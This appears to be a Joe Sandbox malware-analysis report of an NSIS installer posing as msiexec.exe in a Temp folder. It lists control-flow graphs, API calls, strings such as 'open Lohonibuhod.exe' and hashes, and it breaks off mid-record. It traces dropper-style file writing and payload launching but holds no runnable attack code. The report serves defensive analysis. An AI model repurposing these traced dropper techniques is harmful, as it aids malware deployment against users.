            • Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_400000_msiexec.jbxd
            Similarity
            • API ID: Find$CloseFileFirst
            • String ID:
            • API String ID: 2295610775-0
            • Opcode ID: 0ba34ad688579e7913e3aeb04dcfdbb9c24dd4cd636fec125d72bd6057fbbed4
            • Instruction ID: 6bc8dc8487d68019062fb65c0caa7a5850599756ae9c65598668cc32d68c0862
            • Opcode Fuzzy Hash: 0ba34ad688579e7913e3aeb04dcfdbb9c24dd4cd636fec125d72bd6057fbbed4
            • Instruction Fuzzy Hash: C5D0123195D5309BD31017797C0C85B7A58DF293317108A33F025F22E0D3749C519AED
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 106 402c22-402c70 GetTickCount GetModuleFileNameA call 4056e3 109 402c72-402c77 106->109 110 402c7c-402caa call 405a0c call 405546 call 405a0c GetFileSize 106->110 111 402e54-402e58 109->111 118 402cb0 110->118 119 402d97-402da5 call 402bbe 110->119 120 402cb5-402ccc 118->120 125 402da7-402daa 119->125 126 402dfa-402dff 119->126 122 402cd0-402cd2 call 40307d 120->122 123 402cce 120->123 130 402cd7-402cd9 122->130 123->122 128 402dac-402dc4 call 4030af call 40307d 125->128 129 402dce-402df8 GlobalAlloc call 4030af call 402e5b 125->129 126->111 128->126 152 402dc6-402dcc 128->152 129->126 157 402e0b-402e1c 129->157 132 402e01-402e09 call 402bbe 130->132 133 402cdf-402ce6 130->133 132->126 136 402d62-402d66 133->136 137 402ce8-402cfc call 4056a4 133->137 141 402d70-402d76 136->141 142 402d68-402d6f call 402bbe 136->142 137->141 155 402cfe-402d05 137->155 148 402d85-402d8f 141->148 149 402d78-402d82 call 405d9a 141->149 142->141 148->120 156 402d95 148->156 149->148 152->126 152->129 155->141 161 402d07-402d0e 155->161 156->119 158 402e24-402e29 157->158 159 402e1e 157->159 162 402e2a-402e30 158->162 159->158 161->141 163 402d10-402d17 161->163 162->162 164 402e32-402e4d SetFilePointer call 4056a4 162->164 163->141 165 402d19-402d20 163->165 168 402e52 164->168 165->141 167 402d22-402d42 165->167 167->126 169 402d48-402d4c 167->169 168->111 170 402d54-402d5c 169->170 171 402d4e-402d52 169->171 170->141 172 402d5e-402d60 170->172 171->156 171->170 172->141
            APIs
            • GetTickCount.KERNEL32("C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" ,00000000,00000000), ref: 00402C33
            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe,00000400), ref: 00402C4F
              • Part of subcall function 004056E3: GetFileAttributesA.KERNEL32(00000003,00402C62,C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe,80000000,00000003), ref: 004056E7
              • Part of subcall function 004056E3: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405709
            • GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,C:\Users\user\AppData\Local\Temp\MSI,C:\Users\user\AppData\Local\Temp\MSI,C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe,C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe,80000000,00000003), ref: 00402C9B
            Strings
            • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C22
            • Inst, xrefs: 00402D07
            • Error launching installer, xrefs: 00402C72
            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402DFA
            • soft, xrefs: 00402D10
            • "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" , xrefs: 00402C2C
            • C:\Users\user\AppData\Local\Temp\MSI, xrefs: 00402C7D, 00402C82, 00402C88
            • C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe, xrefs: 00402C39, 00402C48, 00402C5C, 00402C7C
            • Null, xrefs: 00402D19
            Memory Dump Source
            • Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_400000_msiexec.jbxd
            Similarity
            • API ID: File$AttributesCountCreateModuleNameSizeTick
            • String ID: "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\MSI$C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
            • API String ID: 4283519449-782581025
            • Opcode ID: 1aa0d1efbed9786f842be751fafdabbb11e6860e74167932e572fcfd279c9ed7
            • Instruction ID: 5cdc40c0d59b83eec34e45f83230a383a342561faf5f4e8ee161a7b3089b1b43
            • Opcode Fuzzy Hash: 1aa0d1efbed9786f842be751fafdabbb11e6860e74167932e572fcfd279c9ed7
            • Instruction Fuzzy Hash: 40512371A00214ABDB20DF61DE89B9E7BA8EF04329F10413BF905B62D1D7BC9D418B9D
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 242 402e5b-402e6f 243 402e71 242->243 244 402e78-402e81 242->244 243->244 245 402e83 244->245 246 402e8a-402e8f 244->246 245->246 247 402e91-402e9a call 4030af 246->247 248 402e9f-402eac call 40307d 246->248 247->248 252 402eb2-402eb6 248->252 253 403028 248->253 254 403011-403013 252->254 255 402ebc-402f05 GetTickCount 252->255 256 40302a-40302b 253->256 260 403015-403018 254->260 261 403068-40306c 254->261 257 403073 255->257 258 402f0b-402f13 255->258 259 403076-40307a 256->259 257->259 264 402f15 258->264 265 402f18-402f26 call 40307d 258->265 262 40301a 260->262 263 40301d-403026 call 40307d 260->263 266 40302d-403033 261->266 267 40306e 261->267 262->263 263->253 275 403070 263->275 264->265 265->253 276 402f2c-402f35 265->276 270 403035 266->270 271 403038-403046 call 40307d 266->271 267->257 270->271 271->253 279 403048-40305b WriteFile 271->279 275->257 278 402f3b-402f5b call 405e08 276->278 285 402f61-402f74 GetTickCount 278->285 286 403009-40300b 278->286 281 40300d-40300f 279->281 282 40305d-403060 279->282 281->256 282->281 284 403062-403065 282->284 284->261 287 402f76-402f7e 285->287 288 402fb9-402fbd 285->288 286->256 291 402f80-402f84 287->291 292 402f86-402fb6 MulDiv wsprintfA call 404daa 287->292 289 402ffe-403001 288->289 290 402fbf-402fc2 288->290 289->258 296 403007 289->296 294 402fe4-402fef 290->294 295 402fc4-402fd8 WriteFile 290->295 291->288 291->292 292->288 299 402ff2-402ff6 294->299 295->281 298 402fda-402fdd 295->298 296->257 298->281 300 402fdf-402fe2 298->300 299->278 301 402ffc 299->301 300->299 301->257
            APIs
            • GetTickCount.KERNEL32(000000FF,00000004,00000000,00000000,00000000), ref: 00402EC2
            • GetTickCount.KERNEL32(?YA,00414B88,00004000), ref: 00402F69
            • MulDiv.KERNEL32 ref: 00402F92
            • wsprintfA.USER32 ref: 00402FA2
            • WriteFile.KERNEL32(00000000,00000000,0041D988,7FFFFFFF,00000000), ref: 00402FD0
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_400000_msiexec.jbxd
            Similarity
            • API ID: CountTick$FileWritewsprintf
            • String ID: ... %d%%$?YA
            • API String ID: 4209647438-2008082034
            • Opcode ID: 41e35a0a14bb3f2fd38d9c716afd6c3ba0ace6c0ea9dec4adf0e27dc0e0f292a
            • Instruction ID: 0d39cdfb2b20f01ea0ef459ff81ac6f09524c508dd7874cbed1e127a204ff5ac
            • Opcode Fuzzy Hash: 41e35a0a14bb3f2fd38d9c716afd6c3ba0ace6c0ea9dec4adf0e27dc0e0f292a
            • Instruction Fuzzy Hash: 3D618D7190121AEBDF10CF65DA44A9E7BB8EF04366F10413BF800B72D4D7789A51DBAA
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 302 401734-401757 call 4029f6 call 40556c 307 401761-401773 call 405a0c call 4054ff lstrcatA 302->307 308 401759-40175f call 405a0c 302->308 313 401778-40177e call 405c6e 307->313 308->313 318 401783-401787 313->318 319 401789-401793 call 405d07 318->319 320 4017ba-4017bd 318->320 327 4017a5-4017b7 319->327 328 401795-4017a3 CompareFileTime 319->328 322 4017c5-4017e1 call 4056e3 320->322 323 4017bf-4017c0 call 4056c4 320->323 330 4017e3-4017e6 322->330 331 401859-401882 call 404daa call 402e5b 322->331 323->322 327->320 328->327 332 4017e8-40182a call 405a0c * 2 call 405a2e call 405a0c call 4052cd 330->332 333 40183b-401845 call 404daa 330->333 345 401884-401888 331->345 346 40188a-401896 SetFileTime 331->346 332->318 366 401830-401831 332->366 343 40184e-401854 333->343 347 402894 343->347 345->346 349 40189c-4018a7 CloseHandle 345->349 346->349 350 402896-40289a 347->350 352 40288b-40288e 349->352 353 4018ad-4018b0 349->353 352->347 355 4018b2-4018c3 call 405a2e lstrcatA 353->355 356 4018c5-4018c8 call 405a2e 353->356 360 4018cd-402213 call 4052cd 355->360 356->360 360->350 369 40265c-402663 360->369 366->343 368 401833-401834 366->368 368->333 369->352
            APIs
            • lstrcatA.KERNEL32(00000000,00000000,00409B80,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401773
            • CompareFileTime.KERNEL32(-00000014,?,00409B80,00409B80,00000000,00000000,00409B80,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 0040179D
              • Part of subcall function 00405A0C: lstrcpynA.KERNEL32(?,?,00000400,00403168,0042E360,NSIS Error), ref: 00405A19
              • Part of subcall function 00404DAA: lstrlenA.KERNEL32(004297B8,00000000,0041D988,756F110C,?,?,?,?,?,?,?,?,?,00402FB6,00000000,?), ref: 00404DE3
              • Part of subcall function 00404DAA: lstrlenA.KERNEL32(00402FB6,004297B8,00000000,0041D988,756F110C,?,?,?,?,?,?,?,?,?,00402FB6,00000000), ref: 00404DF3
              • Part of subcall function 00404DAA: lstrcatA.KERNEL32(004297B8,00402FB6,00402FB6,004297B8,00000000,0041D988,756F110C), ref: 00404E06
              • Part of subcall function 00404DAA: SetWindowTextA.USER32(004297B8,004297B8), ref: 00404E18
              • Part of subcall function 00404DAA: SendMessageA.USER32 ref: 00404E3E
              • Part of subcall function 00404DAA: SendMessageA.USER32 ref: 00404E58
              • Part of subcall function 00404DAA: SendMessageA.USER32 ref: 00404E66
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_400000_msiexec.jbxd
            Similarity
            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
            • String ID: C:\Users\user\AppData\Local\Temp$fd $open Lohonibuhod.exe
            • API String ID: 1941528284-1897024734
            • Opcode ID: f324c85fc2f324614552c21af61c380c89f90457e6ef3776ce2ffda22f3967b2
            • Instruction ID: 2412d90e5cc6ef50ac46e2462e63b4f26081636668b1d4f665875a47291bc265
            • Opcode Fuzzy Hash: f324c85fc2f324614552c21af61c380c89f90457e6ef3776ce2ffda22f3967b2
            • Instruction Fuzzy Hash: 4341D831A10515BACF10BBB5DD86DAF3A69EF41328B24433BF511F11E2D67C4A418E6D
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 370 4015b3-4015c6 call 4029f6 call 405593 375 4015c8-4015e3 call 40552a CreateDirectoryA 370->375 376 40160a-40160d 370->376 383 401600-401608 375->383 384 4015e5-4015f0 GetLastError 375->384 378 40162d-402169 call 401423 376->378 379 40160f-401628 call 401423 call 405a0c SetCurrentDirectoryA 376->379 391 40288b-40289a 378->391 379->391 383->375 383->376 388 4015f2-4015fb GetFileAttributesA 384->388 389 4015fd 384->389 388->383 388->389 389->383
            APIs
              • Part of subcall function 00405593: CharNextA.USER32(ES@), ref: 004055A1
              • Part of subcall function 00405593: CharNextA.USER32(00000000), ref: 004055A6
              • Part of subcall function 00405593: CharNextA.USER32(00000000), ref: 004055B5
            • CreateDirectoryA.KERNEL32(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
            • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
            • GetFileAttributesA.KERNEL32(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
            • SetCurrentDirectoryA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401622
            Strings
            • C:\Users\user\AppData\Local\Temp, xrefs: 00401617
            Memory Dump Source
            • Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_400000_msiexec.jbxd
            Similarity
            • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
            • String ID: C:\Users\user\AppData\Local\Temp
            • API String ID: 3751793516-2935972921
            • Opcode ID: d0bac1e6b020b5001be7ab41a75496c2f01233b398ddf1ad5a6b7401c24eee4e
            • Instruction ID: bf1eb0eabc3c1df6ff2fb323ed3efcd7168262dea338722757ad05095e7f5395
            • Opcode Fuzzy Hash: d0bac1e6b020b5001be7ab41a75496c2f01233b398ddf1ad5a6b7401c24eee4e
            • Instruction Fuzzy Hash: AB012631908180AFDB217F756D449BF6BB0EA56365728073FF492B22E2C23C4D42962E
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 395 405712-40571c 396 40571d-405747 GetTickCount GetTempFileNameA 395->396 397 405756-405758 396->397 398 405749-40574b 396->398 400 405750-405753 397->400 398->396 399 40574d 398->399 399->400
            APIs
            • GetTickCount.KERNEL32("C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004030F8,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405725
            • GetTempFileNameA.KERNEL32(?,0061736E,00000000,?), ref: 0040573F
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_400000_msiexec.jbxd
            Similarity
            • API ID: CountFileNameTempTick
            • String ID: "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" $C:\Users\user\AppData\Local\Temp\$nsa
            • API String ID: 1716503409-3481335202
            • Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
            • Instruction ID: 857343acb9398127b83b67a88284cb3acf20d602f6beb627bdaaa73bf87bc8f8
            • Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
            • Instruction Fuzzy Hash: 19F0A736348204BAE7105E55DC04B9B7F99DFD1750F14C027F9449B1C0D6F099589BA9
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            APIs
              • Part of subcall function 00405C6E: CharNextA.USER32(?), ref: 00405CC6
              • Part of subcall function 00405C6E: CharNextA.USER32(?), ref: 00405CD3
              • Part of subcall function 00405C6E: CharNextA.USER32(?), ref: 00405CD8
              • Part of subcall function 00405C6E: CharPrevA.USER32(?,?), ref: 00405CE8
            • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403244), ref: 004030E7
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_400000_msiexec.jbxd
            Similarity
            • API ID: Char$Next$CreateDirectoryPrev
            • String ID: 1033$C:\Users\user\AppData\Local\Temp\
            • API String ID: 4115351271-1176120985
            • Opcode ID: 9fc94c8ce289ceace51d82d7694160c71b26e7ee5232ad3accb455f1d4d4e313
            • Instruction ID: 7f1b43601f0a10077d0081c2ba5ec5825ac71a1bded9547d22d949ebda8a6a9f
            • Opcode Fuzzy Hash: 9fc94c8ce289ceace51d82d7694160c71b26e7ee5232ad3accb455f1d4d4e313
            • Instruction Fuzzy Hash: B6D0922150AD3031D651322A3E06BCF154D8F4636AF65807BF944B608A4A6C2A825AEE
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 412 405d2e-405d48 GetModuleHandleA 413 405d55-405d5c GetProcAddress 412->413 414 405d4a-405d53 LoadLibraryA 412->414 415 405d62-405d64 413->415 414->413 414->415
            APIs
            • GetModuleHandleA.KERNEL32(?,?,00000000,0040313D,00000008), ref: 00405D40
            • LoadLibraryA.KERNEL32(?), ref: 00405D4B
            • GetProcAddress.KERNEL32(00000000,?,?,00000000,0040313D,00000008), ref: 00405D5C
            Memory Dump Source
            • Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_400000_msiexec.jbxd
            Similarity
            • API ID: AddressHandleLibraryLoadModuleProc
            • String ID:
            • API String ID: 310444273-0
            • Opcode ID: 7acfb344228b968400b962badda7c36266698eee5c55508006b44164a923ef80
            • Instruction ID: 58781945b1ebe0d6425232f008294b0fb1b641fb0524d4e5e5734917004db801
            • Opcode Fuzzy Hash: 7acfb344228b968400b962badda7c36266698eee5c55508006b44164a923ef80
            • Instruction Fuzzy Hash: 8CE08C36A04510BBD3215B30AE08A6B73ACEEC9B41304897EF615F6251D734AC11DBBA
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 416 401dc1-401e10 call 4029f6 * 4 call 401423 ShellExecuteA 427 401e16-402663 416->427 428 40288b-40289a 416->428 427->428
            APIs
            • ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\Temp,?), ref: 00401E07
            Strings
            • C:\Users\user\AppData\Local\Temp, xrefs: 00401DF2
            Memory Dump Source
            • Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_400000_msiexec.jbxd
            Similarity
            • API ID: ExecuteShell
            • String ID: C:\Users\user\AppData\Local\Temp
            • API String ID: 587946157-2935972921
            • Opcode ID: 92a71e7eb882e930239a50fdfd0ea1f39457095dd02150c3192536a82a5d7dc6
            • Instruction ID: 1d9e37e4724715ff8eb4cd61c52570f4e17590a8471f76494d0d603f05069ab9
            • Opcode Fuzzy Hash: 92a71e7eb882e930239a50fdfd0ea1f39457095dd02150c3192536a82a5d7dc6
            • Instruction Fuzzy Hash: C3F04C73B04301AACB50AFB19D4AE5E3BA8AB41398F200637F510F70C1D9FC8801B318
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 432 4023af-4023b4 call 402b00 434 4023b9-4023c6 call 4029f6 432->434 437 40265c-402663 434->437 438 4023cc-4023ea RegQueryValueExA 434->438 439 40288b-40289a 437->439 440 402420-402425 438->440 441 4023ec-4023f0 438->441 445 40247c-402483 RegCloseKey 440->445 443 4023f2-4023f5 441->443 444 40240b-40241e call 40596a 441->444 447 4023f7-4023fb 443->447 448 4023fd-402409 443->448 444->445 445->439 447->440 447->448 448->445
            APIs
              • Part of subcall function 00402B00: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00000022,00000000), ref: 00402B28
            • RegQueryValueExA.ADVAPI32 ref: 004023DF
            • RegCloseKey.ADVAPI32(?), ref: 0040247D
            Memory Dump Source
            • Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_400000_msiexec.jbxd
            Similarity
            • API ID: CloseOpenQueryValue
            • String ID:
            • API String ID: 3677997916-0
            • Opcode ID: 0d017b4a1ff679f66b1b70c9321ccb7683fc271020f3e65c8c30c9d46f938ea0
